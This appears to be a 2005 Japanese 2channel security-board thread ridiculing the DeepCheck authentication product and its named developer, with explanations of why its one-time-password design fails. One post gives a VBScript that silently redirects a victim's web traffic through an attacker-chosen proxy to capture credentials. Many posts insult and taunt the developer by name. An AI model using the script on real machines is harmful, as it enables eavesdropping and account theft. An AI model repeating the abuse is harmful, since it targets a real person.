おいら「セキュリティホールmemo ってどうよ? その4」の 687 なんだけど もうとっくのとおに、指摘するの馬鹿馬鹿しいからウォッチに切り替えたさ。 結局ここまで長々やっても何にも変わらない。相変わらずのループ。 相手が相当分かっていない・本気で分かっていないので、暖簾に腕押し。 もうみんな相手するのやめようよ。 最終的に損している・損するのは自分自身なんだし。 百万が一 DeepCheck が売れたら、買った所に優しく指摘・解説してあげるさ。 で、なんじゃこりゃってことになって、社会的にダメージを受ければ良いさ。 それまで放っておこうと思う。 まぁ、確かに、内容は限りなく詐欺に近いけど、好きにさせてみようよ。 ほんと、何度も言うけど、最終的に損している・損するのは自分自身なんだし。
>>414 uramoty は破ってみろループに突入しつつ粘着するだろうね。
俺も DeepCheck に関してはもういいよ。ダメさはわかった。
ただ、DeepCheck+ は楽しみにしているよ。
どのぐらいドラスティックに変更されるか見ものだ。
>>416 浦本さんが今まで皆さんの期待を裏切ったことあります?
>>415 本人です。
分かってない人へのちょっとしたお土産。
いわゆる初心者ユーザターゲットだったら
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", "1", "REG_DWORD"
objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer", "適当アドレス:適当ポート", "REG_SZ"
なる WSH スクリプトを実行させることさえ出来れば、
攻撃者は「適当アドレス:適当ポート」に proxy サーバを設置して
通信内容をモニターしておけば良いだけだね。
まぁ、知人のアカウントを破る程度であれば、
知人宅で proxy 設定をいじるだけで済むけどね。
そいだけ。じゃーあねー。
___ | | |C D | |h e | |e e | ,,,. |c p | ,'"';, 、''゙゙;、). |k | 、''゙゙;、),、 ゙''!リ'' i二二二二!゙''l!リ'''゙ ‖ `i二二二!´ ‖ 昌 |: ̄ ̄ ̄ ̄:| 昌 | ̄:|_|;;;l"二二゙゙l;;|_| ̄:| | :|::::::| |;;;;;;;;;;| |::::| :| | :|::::::|┌─┐|::::| :| ./゙゙└‐┴ ┴l,,,,,,,,,,l┴┴‐┘゙゙゙゙\ | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|  ̄|三|三三|三三三三|三三|三| ̄ | |::: |: : : : |:: | | | |::: |: : : : |:: | | /_|::: |: : : :.|:: :|_ヽ _|___|;;;;;;;;;;|,;,;,,,,,,,,,,,,,,,;,;,|;;;;;;;;;;|___|_ l;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l
>ウラモティ
いいかげんJavaHouseの参加者に謝れ!
謝罪すると宣言しておいて一年以上謝罪しないこの大ウソツキめが!
自分の利益のためだけに他人に迷惑をかけてるとは、貴様はひとでなし以外の何者でもないわっ。
>>419 (-∧-;) ナムナム
あんまりウラモティをいじめちゃだめだよw
皆さん、いろいろ楽しんだみたいで、お疲れでした。 今日はなんだか体調が悪いので、幾つかの問いには、本日中ですが、オイオイ、答えさせていただきます。
浦本さん、、、 今日は非「営業日」なんだし、そんな言い訳しなくても じっくりカラダ休めて休んでいいんだよ。 俺たちが浦本さんの元気な姿見られるのは、ここだけなんだから。。。
>>422 > そして、昨夜は、誰もDeepCheckを破れなかった。
いや、もうDeepCheckは理論的には終わってるから。
それにここの住人は浦本さんをいじめてるつもりはあまりないんじゃないかな。
約一名、技術的な話しについていけなくて、火病起こすひとはいるけどね。
426 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 14:42:12
やあ。10レスゲームの人だよ。 ほほう。五つの問題点のうちいくつかは致命的だったはずだが・・・ 前スレ410氏が言うように、DeepCheckは論理的に破られた。そう、あとは自動化されるだけ。 前スレ175氏が実際に破った(←これ重要。本当に破っている。)ことを、論理的に手作業で追試・確認したのが 前スレ410氏だ。 いいか。 前スレ37氏が自身のセッションを提示した。これは「前スレ37氏の操作がスパイウェアで抜かれた」に相当する。 それをもとに前スレ175氏が前スレ258で前スレ37氏のデータをパスワードに複合するコードを提示。 これで、「スパイウェアが抜いたデータをパスワードに復号できること」が証明された。 この時点で、DeepCheckは「破られている」(←これ重要) この「DeepCheckは破られている」(←これ重要)ことを、前スレ410氏は机上で証明して書き込んだ。 DeepCheckは破られている。 さらに、昨夜俺が提示したように、致命的な問題が山積している。要するに、DeepCheckは終わっている。 これだけ書けば、約一名を除いて全員理解できるだろう。
427 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 15:45:17
浦本はひとつのツールを失った。しかし、これは敗北を意味するのか?否!始まりなのだ! セキュリティ業界に比べ、我がエクスファの能力は300万分の1以下である。 にもかかわらず今日まで生き抜いてこられたのは何故か? 諸君!我が浦本の主要収入がアルバイトだからだ。これは諸君らが一番知っている。 浦本は業界を追われ、フリーターにさせられた。 そして、一握りのエリートらが世界にまで膨れ上がったセキュリティ業界を支配して10余年、 社会の底辺に住む浦本が仕事を要求して何度踏みにじられたか。 エクスファの掲げるdeepCheckの宣伝のための戦いを笑いの神が見捨てるはずはない。 私の弟!諸君らが愛してくれた浦本・勝久のDeepCheckは死んだ。 何故だ!? 「いや、あれじゃムリだろ」 新しい時代の覇権を選ばれた浦本が得るは、脳内の必然である。 ならば、浦本は襟を正し、約束どおり引退しなければならぬ。 浦本は過酷なIT業界を生活の場としながらも無職に苦悩し、錬磨せずついに無能を守り抜いてきた。 かつて、浦本・勝久はセキュリティの革新は無能の民たるエクスファから始まると言った。 しかしながらセキュリティホールmemoの参加者共は、フッタがspamの機能を有すると指摘し浦本を罵倒する。 浦本の妻も、子もそのエクスファの無思慮な行動の前に飢えていったのだ! この悲しみも怒りも忘れてはならない!それを、DeepCheckは!死をもって浦本に示してくれた! 浦本は今、この事実を認識し、問題点を改善して、初めてスタートラインに立つことができる。 この復活こそ、親類縁者全てへの最大の慰めとなる。 浦本よ立て!妄想を過去に捨てて、いいかげん気付けよ!浦本よ! 浦本ら電波系こそ笑いの神に選ばれた民であることを忘れないでほしいのだ。 希少種である彼らこそネタを産み得るのである。チープ・チェック!!
浦本さん体調はどう?
浦本さんがもし死んでしまったとしても、 浦本さんの魂は、俺らの心の中にずっと、残っていくよ、浦本さん。。。
>>423 これら↓にもしっかり答えてくださいね。
----------
・し○ふ氏への謝罪の件。謝罪しないのならその弁明。
・JavaHouseへの謝罪の件。謝罪しないのならその弁明。
・高木浩光氏への謝罪の件。謝罪しないのならその弁明。
・セキュリティホールmemoへの謝罪の件。謝罪しないのならその弁明。
・kjm氏への謝罪の件。謝罪しないのならその弁明。
431 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 18:19:28
本日中。 現在、18:20 あと六時間を切っていますねえ。
432 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 18:50:07
そろそろ大学3年生、大学院1年生の就職活動の季節ですね。 ところでエクスフェー社の募集要項などが見当たらないのですが、来年は募集しないのでしょうか? 就職板にエクスフェー社のスレッドが見当たらないのでこちらに質問させて頂きました。 よろしければエクスフェー社の採用担当の方が就職板に新スレッドを立てていただければと思います。 エクスフェーの今後のご発展を祈っております。 では。
433 :
432 :2005/11/23(水) 20:14:56
すいません432はなかったことにして下さい。
434 :
432 :2005/11/23(水) 20:33:15
すみませんエクスフェーじゃなくてエクスファでした。 浦本さん(社長さん?)の気を不味くしちゃったのなら、御免なさい。
浦本さん、ここはまず謝罪だろう。
438 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 22:12:42
あと二時間を切ったぞ浦本。 今日中に何か答えるんじゃなかったのかね?ん? それともやはりまたウソだったかね?ん?
439 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 22:14:46
破られてないと言うのは一人だけだね…。 ただ本人がどうしても認めようとしないだけのこと。 はいはい終わり終わり。(^-^)
440 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 22:14:56
すでに破られたクソツールに拘るのは何故かね?ん? 一年が無駄に過ぎたことを認めたくないのかね?ん? 若者と違ってお前には残された時間が少ないからというなら、わからなくもない、が。 それならもう少しマシな時間の使い方をしたらどうだね?ん?
>>436 もう破られてますよ〜。
ホント浦本さんはおっちょこちょいだなぁ(笑)
442 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 22:29:11
後一時間半で浦本勝久はウソツキであることが実証される。
443 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 22:42:16
>>423 時間は過ぎていく。
今日中にはたして何に答えられるというんだろうか。
444 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 23:01:34
10レスゲームとは違って自分で期限を切ったんだからな、浦本。
>>423 をよく思い出せ。自分で書いたことも読めないか?思い出せないか?理解できないか?
あと一時間ほどでタイムアウトだ。
浦本。DeepCheckのクソっぷりも、お前の無能さも、人として最低であることも、
お前以外は認めている。
あと一時間。
何か答えられるのかな?
答えたつもり、なんてのは通用しない。2ちゃんねるは特別な場所ではない。社会の縮図でしかないんだ。
社会で「つもり」が通用するかね?通用したかね?浦本よ。お前、十年かかって一年分しか成長しないのか?
さ、答えを待っているよ。今日中に答えるんだろう?
あと一時間だ。
445 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 23:12:33
自分が言い出したこともまともに履行できない浦本@エクスファ。 エクスファという会社は、約束したことを守れない会社、ということになるなあ。 約束したことを守れないっていうことは、契約を履行できないってことだ。 エクスファってのは、契約対象として選択できる会社ではない、ということになるなあ。 なんせ、代表である浦本が自分から持ち出した約束を履行しないんだからなあ。 さあ、あと50分を切ったね。何に答えられるんだろうねえ。 経験上、また妄想や逃げ口上で破られたDeepCheckを「まだだ!まだ破られておらんよ!」と強弁するんだろうね。 でも、誰にも通じないから。誰が見てもDeepCheckは、破られ、クソであると見破られ、使い物にならないと見放されている。 さて、答えてくれよ。
446 :
432 :2005/11/23(水) 23:21:44
>>434 は私ではありません。偽者だと思います。
なお、エクスフェーでもおかしくないとも思っています。
いじょう、ありがとうございました。
447 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 23:34:04
あと30分を切ったね。
>>423 >本日中ですが、オイオイ、答えさせていただきます。
ウソはよくないよねえ。
>447 JSTとは言っていない 地球時間でとも言っていないしなw 去年も似たようなことがあった。 そういうやり取りしかできない奴なんだよ、カレは。
あと10分をきったか
またまた出た〜〜浦本の虚言グセ(笑)
浦本さんとはどういう男か、わかりやすくまとめてみた ・約束を守れない ・時間を守れない ・日本語力がない ・嘘をつくことが多い ・謝ることができない ・論理的思考ができない ・すぐに逆ギレする ・誠意がない よって、浦本さんは信用できない男だ。
452 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 00:09:29
浦本はウソツキであることが浦本自身によって明らかになりました。 技術者としても 社長としても 人としても クズですね、浦本。 (敬称は敬える人につけるものなので、付けられませんでした)
>451 毛が無いが抜けているようだが
浦本はやっぱり約束守れなかったんだな。 浦本は最低の男だ・・・。
これだけ嘘をつくってことは…。 たぶん、デモサイトのuraアカウントもとっくに破られてるんだろうな。 卑怯だよ、卑怯だよウラモっさん。
「暗号を使わない」と言っておいて実は使っているっていう、ウソもついてたしな。 しかもそれを指摘されたら「気がつかなかった」って…。 いったい、何が真実なのかどうかもう分からないよ、このおっさんの発言。
約束しても、やりたくても、実行できないときや事もある。
>>455 さん
>たぶん、デモサイトのuraアカウントもとっくに破られてるんだろうな。
ここまで疑われたんじゃ、オイラが今後、何を、どう答えても、意味ないでしょう?
458 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 07:28:44
>>457 >約束しても、やりたくても、実行できないときや事もある。
そのときはとりあえず一報入れるのが社会の常識だ。
それとも何か?エクスファは取引先が黙ったまま、納品してこなくても、入金してこなくても
「約束しても、やりたくても、実行できないときや事もある。 仕方が無い」と諦めるのかね?
なぜ「できなかった」のか理由を明らかにしない限り、かつ、それが納得できる理由でない限り、
誰もお前のことは信用しない。
お前は嘘つきで、誠意も無く、逃げてばかりで問題解決も行わず、約束すら破って平気なやつだ。
違うなら違うことを証明してみせろよ。
この評価はお前がこれまでやってきたことの「結果」だ。お前がどう思っていようとな。
評価ってのは他人が下すもんだ。お前の評価は、サイテーだ。
>>457 blog書いてる暇はあるのに、そのいいわけは信用されないと思うぞ。
>>458 さん
>そのときはとりあえず一報入れるのが社会の常識だ。
あなたくらいの発言をされる方なら、一報できない時もある事くらい、何度か体験してるでしょう。
体験がなくとも想像できませんか?
2ch が記名だったら、同じ事、書けますか?
DeepCheckについていくら悪口を書かれても、許せますが、アジるためだけのPOSTは、あきちゃいますよ。
今日も、これから商談とリクルーティング。
461 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 08:34:58
>>460 一報できなくても事後報告はあるな。
そもそも、指摘事項や質問への回答くらいすぐにできる。
それこそ寝る時間を10分ずらすだけで済む。
一報すらできないなら事後報告は当然。そうやって妄想捏造インチキウソイツワリ書いてるひまに
言い訳の一つでもしてみろこのクズ野郎が。
それができないくらいの緊急事態なら、今こうやってダラダラ書いてられないだろう。
さあ、理由を明らかにしてみろ。まともな理由があるならな。
お前に商談があるとは思えんな。ハロワで仕事を探すのは商談じゃないぞ。
リクルーティングって、やっとプログラマを辞めて職探しする気になったか。
少しはウソと妄想以外のことを書いたらどうだ。ん?
462 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 10:00:18
つまりあれか。浦本的には ・自分が言い出した期限も守らず ・自分が言い出したことをなにもせず ・WEBで遊んでニュースサイトの過去ログを二年以上も遡って読んで ・自分のblogを更新する という、まさにダラダラ遊んでいても、それは「一報すら入れられないくらいの緊急事態」なわけだ。 ふーん。 やっぱりクズだねえ、浦本は。
463 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 10:25:31
浦本の頭の悪さ。自分が作った製品の特徴を理解していない。
一例を挙げよう。
http://release.japan.zdnet.com/abstract.html?release_id=4748 >DeepCheckの特長
>
>1:ワンタイム・パスワードをベースにしています。
>2:ワンタイム・パスワード方式に不可欠な提供側と利用者側との次回パスワードの同期に独自の方式を開発、組み込みました。(複合パスワード)
参考:「ワンタイムパスワードとは」 e-Words
http://e-words.jp/w/E383AFE383B3E382BFE382A4E383A0E38391E382B9E383AFE383BCE38389.html >ユーザは自分しか知らない秘密のパスワードを端末に入力する。端末に備えられたソフトウェアがサーバから送られてきたチャレンジ文字列とユーザが入力したパスワードを一定の手順に従って演算し、生成された結果(「レスポンス」と呼ばれる)をサーバに送信する。
要するにワンタイムパスワードってのは、チャレンジ-レスポンス方式ってことだ。
DeepCheckはワンタイムパスワードの仕組みを「ベースにすらしていない」ことはすでに明らかになっているね。
そもそもワンタイムパスワードではパスワードの同期は行う必要がないんだよねー。
言ってみれば、「サーバが送ってきた文字列を、ユーザのパスワードをキーにして暗号化」したものをサーバに送ると、
サーバはユーザが送ってきた文字列と「サーバが送った文字列をユーザのパスワードをキーにして暗号化した文字列」
を比較する。結果が一致すれば正しいパスワードが入力された、とするもので、チャレンジ文字列となる「サーバが送る
文字列」が毎回変わるために「ユーザがサーバに送る」文字列も毎回変わる、というものだ。
浦本はまず認証方式に対して無知なんだねえ。
464 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 10:25:57
>>461-464 どうやらあなたひとりの様だけど、そんなに寂しくひまなのか〜?
あなたの場合、書けば書くほど、あとでハジかいちゃうことになるんで
もう少しワンタイム・パスワードの事やらJVMの事やら実際にこなしてから
書かれた方が良いと思います。
リクルートと内職探しとDeepCheck+とブログ書きに忙しいので、
なかなか、この板に来れないと思うよ。
以下はついで。
まだ、破られていません。
有効アカウント数がやっと100を突破しました。
466 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 15:19:30
>>465 みんな飽きたんだろう(笑
さて、どんな恥をかくんだろうねえ。ああ、浦本が恥をかくんなら正解だね。
ワンタイムパスワードについて間違いがあったなら指摘してご覧。できるんならね。
JVMのことも間違いがあるなら指摘してご覧。できるんならね。
ブログ書く前にやることがあるだろう?いつまで逃げているんだ?
DeepCheckが破られていないだって?すでに破られているじゃないか。
いくつも出されたDeepCheckの問題点を論破してみろ。できるもんならね。
有効アカウント数が100ねえ。アカウント削除の方法が示されていないからなあ。
それに、本当はいくつあるのか、ちゃんと証拠を出せるのかなあ?
さあ、恥をかかせてみてくれ。この俺に。
俺は10レスゲームの中の人だ。
俺がどんな恥をかくというんだろうね。
467 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 16:28:52
さて、セキュリティ板のみんなには釈迦に説法だろうけど、ただのハゲが混じってるんで一応。 ワンタイムパスワード(OTP)の仕組みはこうだね。 @クライアントに対してサーバが「チャレンジ」を送る。 Aサーバは特定の計算式(上ではこれをパスワードをカギにした暗号化と表現したわけだ)で チャレンジを計算しておく。もちろん、レスポンスを受け取った後で計算してもいいけどね。 Bクライアントはサーバと共通の計算式でチャレンジを計算して「レスポンス」を生成する。 (同じく、これも「パスワードをカギにして暗号化」と表現したわけだね) Cクライアントはチャレンジから得た「レスポンス」をサーバに返す。 Dサーバはクライアントから送られたレスポンスと計算結果を照合する E照合できればOK キモになるのは 「サーバとクライアントが同じ計算をする」 「サーバが生成したチャレンジをもとにする」 「クライアントはトークン等を利用するために認証を行うか、所有者をユーザとみなす」 OTPの生成には様々な方法がある。例えば時刻同期をもとにするもの。 サーバと時刻同期して、その時刻から特定の計算をサーバと専用の「トークン」で行う。 トークンで得られた計算結果を送ることで認証情報に使う。 上の例では「時刻情報」がチャレンジで、同期させることでチャレンジ送信を省略している。 トークンで表示された情報がレスポンスで、トークンは常にサーバと同じ計算をしているってやつだ。 トークンの所有者を正当なユーザである、と見なしているタイプだね。 だが、DeepCheckはサーバ上で演算を行わない。単なるパスワード照合だけだ。 しかもパスワードはクライアント側が決めている。つか、単に毎回パスワードを変更すればいいってもんじゃない。次回が予測できないことも必要だ。 DeepCheckは次回パスワードを送出している。クライアント主導のOTPなんて、OTPなのかな? パスワードで暗号化、という言い方でややこしくしちゃったかな?e-wordsの解説に合わせたのが 裏目に出ちゃったのかね。だとしたらごめんね、釈迦に混じったハゲの人。
ハゲの耳に念仏
469 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 16:31:12
OTPの解説を1レスに押し込めようとしたら本文長すぎで怒られた('A`)
ハゲに真珠
>>469 本当にご苦労さまですが、このハゲに何を言っても無駄かと。
すでにDeepCheckは糞だとはっきりと判明したわけだし、
あとはただ暇な時にからかって遊ぶ程度でいいのでは?
472 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 16:38:33
>>471 うん、文字数削るのにひさびさに苦労した(苦笑
もうこんなのは仕事以外でやりたくねえや。メール欄とか含めたリクエストボディのサイズで
判断してるのね、2chって。
setting.txt で「BBS_MESSAGE_COUNT=2048」になってるから、本文 2048byte かと思ったのに
subject= とか name= とかパラメータ名まで数に入ってた('A`)シランカッタ
ま、そういう収穫もあったんで今回まではヨシとする(笑
あとはハゲが湧いたときヒマだったらおちょくる程度にするよ。
>>465 勘違いなさっているようですが、DeepCheckはとっくに破られています。
あなたがいう破られてないってのは、uraアカウントのカーソル行が変えられてないってだけ。
DeepCheck自体はもう終わっています。
そこんとこ勘違いしないように。
あと、自分から言い出した約束は最低限守ろうね。
いい大人してみっともないですよ。
なんだかんだいって、人のせいにしたりして結局約束守ってないじゃないの。
deepcheckのサイト落ちてる?
まだ、サ ソってのなおってないんだなw
ura の認証成功時のキャプチャデータまだー?
このスレでの一番の収穫は GyaO だ。
存在は知ってたが番組がこんなにたくさんあるとはね。
DeepCheck+ が出るまで GyaO で食神でも見て待ってるよ。
「破る」の定義がすれ違っているので、こっち側が表現変えてあげるとすっ
きりしそうだね。
>>473 のように「終わっています」って表現してあげるのはどうかな?
>>457 アンタは何でそういう応えをするのか…。
アンタさ、自分が原因を作ってるのに、さも相手が原因であるような発言してるんだよ?
今、改めて自分の発言を見てくれ、コレどう思う?
こういう時、普通の人なら反省して自分の行動を改善しようとするんだよ。
アンタにはそういうプロセスが無いんだよ!何で開き直るんだ!?
もぅサービス業をしている人の行動ではないよ…。
ウ ラ モ ト サ ソ ガ ソ バ ツ テ
480 :
名無しさん@お腹いっぱい。 :2005/11/25(金) 00:24:31
>>477 俺もUSENユーザですよ。
GayO、まだ見てないんだよねぇ、新しいPCを買ったら見るつもり。
今のPC古い自作でボードの愛称からか10Mしか使えナインス。光の意味ね〜w
皆知ってるかもしれないけど、ついでに先月やじうまウオッチで紹介されてたGyaO ReviewってサイトのURLを貼っておくよ。
http://gyao.cagami.net/ レビュアーが点数つけてくれてるので事前の参考になるっぽい。
484 :
432 :2005/11/25(金) 03:23:36
>>432 です。先日は失礼いたしました。
このような事情を知らず採用の件を伺ってしまいましたが決して他意があってのことではありません。
社長様のご機嫌を壊してしまったようで申し訳ありませんでした。
スレッドを読んでから投稿すべきだったと反省しております。
いじょうありがとうございました。
>>467 さん
>クライアント主導のOTPなんて、OTPなのかな?
DeepCheckは、この問題提起をしているつもりです。
>>470 さん 名作
>>484 さん 慇懃無礼な嫌みがお得意のようで。
DeepCheckは未だに破られていません。
状況(つまり予算)さえ許せば、当初予定していたライブ中継復活を考えています。
今は、rtsp://ns.x-fer.co.jp/300mp4 で我慢してください。(テストスリーミング)
では、今日も元気にハローワーキング!!!
>>485 破られてないとおっしゃるからには、前スレの410は間違っているということですね?
どこが間違ってるか指摘しないと、説得力がまるでないですよ。
487 :
名無しさん@お腹いっぱい。 :2005/11/25(金) 08:14:18
>>485 >クライアント主導のOTPなんて、OTPなのかな?
>DeepCheckは、この問題提起をしているつもりです。
意味不明。クライアント主導の「OTP」はありえない。なぜか?
それはもう「OTP」じゃないからだ。
問題提起もクソもない。お前が理解できていないだけだよ、無能で嘘つきの浦本。
>DeepCheckは未だに破られていません。
ウソをつくな。もう破られているし、終わっている。いや、採用されるはずが無いことは
ISMSもPマークも安心安全マークも取れなくなることから明らか。つまり、
「DeepCheckは死産だった」、始まっても居なかったんだよ。最初からDeepCheckは死んでいた。
どこにも採用されることは無いだろう。
基本的に、認証システムを作るときの設計がなってないのよねー。 浦本が馬鹿ってのもあるけど、一人で作ってるせいもあるのかもね。
>>487 > クライアント主導の「OTP」はありえない。なぜか?
> それはもう「OTP」じゃないからだ。
その言い方ではトートロジーのような気もする
491 :
名無しさん@お腹いっぱい。 :2005/11/25(金) 09:12:21
>>489 ぬはーん('A`)しまた
つまり、OTPの絶対条件として
・サーバからのチャレンジ(チャレンジに使える共通の乱数値)
・クライアントのレスポンス(チャレンジから共通の計算方法で導き出す)
・サーバがレスポンスを検証
の手順があるわけで、これを外したら別物ってことが言いたかったのです。
なので、「クライアント主導のOTP」なんてものは、すでにOTPではないので、
「クライアント主導のOTP」なんてものはありえない、ということなんですな。
それに、DeepCheckはチャレンジ相当の部分がスッポリ欠けている。
あれはワンタイムパスワードじゃなく、たとえば「毎月パスワードを変更」っていう
Windowsの設定があるじゃん?あれが単に「毎回パスワードを変更」になれば
済んじゃう程度のものでしかないわけよ
しかも、そのほうがDeepCheckよりはるかに安全で操作性もまだマシだ。
DeepCheckはワンタイムパスワードを原型にすらしていない、ってこと。
パスワードを使い捨てればなんでもかんでもOTPってわけじゃない。
492 :
名無しさん@お腹いっぱい。 :2005/11/25(金) 09:26:17
要するに浦本はワンタイムパスワードをちゃんと理解せずに、 使い捨てパスワードという部分だけを使いづらくした挙句に シーザー暗号+α程度の強度で実装しちゃった、と。 インターフェィスも劣化させて、暗号強度も極端に落として、 しかも結局スパイウェアに対抗できない。 パスワードの文字種も減らして、各種認証を受けられない 状態にしちゃった、ということなのです。 あー、うんこしたいのに清掃中で我慢するのは辛い。
うん この認証システムはまずい
浦本さん、MLに早めにDeepCheckが脆弱なことを通知した方がいいですよ
495 :
名無しさん@お腹いっぱい。 :2005/11/26(土) 01:22:10
>>494 大丈夫、利用者がいないので通知する相手もいません。
>>492 手作業ワンタイムパスワードは当初から笑いのポイントですた。
利点が分かっておらず仕組みも分かっておらずというか(苦笑)
改善どころか改悪してるというか(苦笑)
いい機会なので久々にアレを更新しますか。
---------------------------
『DeepCheckの全て』
■クライアント部
認証情報を設定/変更する入力インターフェースパネル。
おそらくキーロガー対策でこのような形式になっていると思われるが、マウス操作のモニタリングや画面キャプチャに対しては何の手立てもない。
操作も複雑でありユーザビリティのかけらもない。
本システムの中で最も必要性の感じられない部分である。
さらにユーザに了解を取らずにMACアドレス+αの収集も行っている。
■通信部
独自暗号方式を用いた通信。
しかし流れているのは数回のモニタリングで解読できるデータであり、盗聴に極めて弱い。
手動ワンタイムパスワード方式により、「速い&安全」なものを「遅い&危険」にするという発想の転換を導入。
本システムの中で最も脆弱な部分である。
■サーバ部
認証情報を複数のDBに分散格納する。
複数DBに格納することが安全性を高めるとうたわれているが、その複数DBすべてを攻撃されたら元も子もない。
例えばかなり大規模に100のDBに認証データを分散格納したとする。これではただ単にセキュリティ強度が100倍になっただけである。
その他既存の暗号アルゴリズム/セキュリティシステムを使えばセキュリティ強度はNのオーダー以上で増加していくことは明白である。
本システムの中で最も技術的に稚拙な部分である。
(「月刊 世界の恥人 2005年11月号 〜ウラモティのこともっと良く知りたい!特集〜」より) ★ワンポイントQ&A★ 【Q】 ウラモティは何で「DeepCheckは破られていない」と言うの?(まさお 5歳) 【A】 それはね、ウラモティお得意の自分ルールを発動してるからだよ。 本当のことを言うと、まさお君が思っている通りDeepCheckはすでに破られているんだ。 何故そんなことをするのかというと、彼がヒトデナシだからだよ。 〜〜〜お父様・お母様へ〜〜〜 言うまでも無いですが、DeepCheckはすでに破られています。 ウラモティが言っているのは単にuraアカウントがハックされていないというだけです。 例えば、手元の文字列をDES暗号を使って暗号化し、それをどこかのサーバに保存し1週間放ってみましょう。 さて、文字列は誰かに複合されてしまったでしょうか?通信データも何もないわけですから普通複合などできません。 ではこれは「DESは破られていない」ということでしょうか?いえいえそんなバカな話はありませんね。 子供は大人の姿を見て育ちます。周りに悪い大人が居たら親御さんが守ってあげてください。 お子様には素直に健やかに育ってほしいものですね。(^-^)
おはよ〜、お、今日は静かやな!
>>497 さん
まさお君に洗脳しちゃだめですよ。
---
週明け早々に間に合うかどうか微妙だけど、予告していましたライブストリーミングを行います。
これで、破られたかどうか、みんなで見守る事が出来ます。(10秒くらいのディレイ有り)
>>498 嘘つきの浦本さん!
大嘘ばかりつかないようにね♪
>>498 DeepCheck+マダァ-? (・∀・ )っ/凵⌒☆チンチン
>>498 技術的な部分に対する反論が全くないのが笑えるw
>>498 >週明け早々に間に合うかどうか微妙だけど、
いつものように、間に合わないに一票!
>>498 なんで浦本さんって、約束の期限までに間に合わないことが多いの?
>>367 ですが、
>>357 で浦本さんが「後日答えさせてくれ」と言ったので
「3日待つ」と私の方で期限を切りました。
昨日で3日経過したわけですが、なぜ何も答えてくれないんですか?
DeepCheckに興味があったんで、出来がよければ導入も考えていたんだけど、 製品の出来以前の問題として浦本さんのサポートが最悪だね・・・。 質問してもまともな回答がこないってどういうことよ?
>>505 > 質問してもまともな回答がこないってどういうことよ?
↓参照
>>497 > 何故そんなことをするのかというと、彼がヒトデナシだからだよ。
まぁこの調子だとDeepCheckを導入したとしても、もしトラブルが起きてサポートを求めた場合どうなるかは明白だね。 期日には間に合わないし、技術的なことは応えてくれないし、話をすり替え、相手をクレーマー扱いにして自分は悪くないと主張し完全無視作戦に入る。 う〜〜ん、これって詐欺だよね?悪徳業者?エクスフェーはそんなことないと信じたいね。(苦笑)
つーかですね、「暗号」なのに、数値で破られにくさを実証できない 時点でダメダメですよ。 漏れはシステム管理者で、自社のシステムに関してはそれなりの権限を 持たされてますけど、 こ ん な シ ス テ ム 、 導 入 で き ね ぇ 。 仮に、もし、万が一、いや、億が一、導入の話が持ち上がったとしても、 上司(というか漏れの上はもうすぐ社長だが)の説得材料がなんにもねぇ。
ウラモティには悪いけど、第三者的に見ると…。 学部生の卒業論文のためのデモシステム以下なんだよな…DeepCheckって…。 長所を技術的に説明できなければ絶対卒業できないし。 論理的な会話ができなければ社会人としても失格だし。 まぁウラモティは「卒論が目的じゃないんだ」とか「論理より大切なことがあるんだ」とか言うんだろうな。(笑) そうやって一生吼えてるんだろうなぁ、かわいそうな人間だよ。 自分の尻尾を追い掛け回してグルグル回っている犬。 電灯に何度も体当たりする虫。 彼らはがんばってるよなぁ、一生懸命だよなぁ。ウラモティもがんばってるよなぁ(笑)
>>498 > おはよ〜、お、今日は静かやな!
たぶん、もう皆アキアキしてきたんだと思うよ。
俺はまだ書き込んでるんだけど、さすがにちょっとシミジミしてる。
気が触れてしまった老人を見てるような虚しさ。
511 :
508 :2005/11/26(土) 19:11:25
>>509 学部生の卒業論文の為のデモシステムでこんなの持ってった日にゃ、
助手さんとか講師さんに一蹴されるよ。間違いない(笑)
ところで漏れさ、InternetWeek2005のSecurityDaysに出席するんだけど、
ウラモティこねぇかな?セキュリティホールmemo BoFとか。
…金無いから来れないかな?
>>511 そんなイベントがあることも知らないと思う。
>>512 ていうか、浦本はその手のイベントには全く出たことがないんじゃないかと思う。
514 :
508 :2005/11/26(土) 19:40:50
>>512 一応memo NLに入っているのなら、主催者からBoFでの講演募集が
あったので、知ってはいると思うんだが…ひょっとしたら脳内フィルタで
フィルタリングされてるかも知れんな(笑)
まぁ仮に来たとして、DeepCheckを売り込みに来ても、相手にしてくれない
と思うから、来ないかなーとは思う。
>>513 そうだなぁ。仮に出てたとしたら、お前は何を得るためにイベントに来たのかと
小一時間(ry
ウラモティ、セキュmemoで物申したいBOFに参加しろ。 さもなくばお前は逃げたとみなす。 顔を合わせて議論する機会を自ら逃避したとみなす。
ひろみちゅとウラモティがばったり出合って切るか切られるかの息を飲む戦いが見られるかもしれん。
そういや、浦本さんは直接顔見せ合って議論したがってたな。 BoFなら浦本さんの望みが叶うんじゃまいか?? 浦本さん、今からでも間に合うから申し込め。 それも今すぐに!
518 :
508 :2005/11/26(土) 20:00:07
>>515 いいねそれ。俺、BoF出るから結果をここに書くよ。
期待して待っててくれ。
